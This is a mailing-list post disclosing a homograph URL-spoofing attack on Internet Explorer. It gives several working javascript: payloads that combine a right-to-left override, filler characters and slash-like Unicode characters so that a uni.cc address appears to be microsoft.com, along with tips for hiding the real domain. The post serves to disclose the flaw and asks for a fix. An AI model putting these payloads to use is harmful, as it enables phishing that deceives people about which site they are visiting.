Re: [idn] another homograph attach: BIDI char

[Soobok Lee <lsb@lsb.org>]

Soobok Lee wrote:

> javascript:void(window.open(unescape("http://www.microsoft.com%u202e.uni.cc/%u1160%u1160%u1160";),"_self"))
>
>
you can add "%u2044" at the filepath part of the url, which has no
length limit like the label part.
If you increase the number of %u1160 to 100, You can hide "uni.cc" part
completely in most browsers.
I request MS's urgent actions.

javascript:void(window.open(unescape("http://www.microsoft.com%u202e.uni.cc/%u1160%u1160%u1160%u2044";),"_self"))


>
> If some IDNA implementation does not handle BIDI filtering/verifying
> well, you can see similar results as "slash-space combination".
> %u202e is a bidi directional formatter (RLO, right-to-left) and should
> not be filtered char-by-char basis, because the char
> plays a crucual role in arabic/hebrew writings. You can refer to
> stringprep/nameprep document for details of BIDI checking part.
>
> Good implementations of IDNA would not suffer from the above attack.
> But, current MSIE does not support IDNA, while it
> still allow arbitrary utf-8 chars. So, current MSIE is exploitable for
> malicious phinshing attempts. I don't know whether this works
> for filefox/mozilla.
>
> The previous example,
> javascript:void(window.open(unescape("http://www.microsoft.com%u2044%u1160%u1160%u1160.uni.cc/";),"_self"))
>
> You can replace %u2044 with %u2205,%u3033 etc. I am now searching more
> slash/space like chars. I will post them here.

%u2205 ===> %u2215

Soobok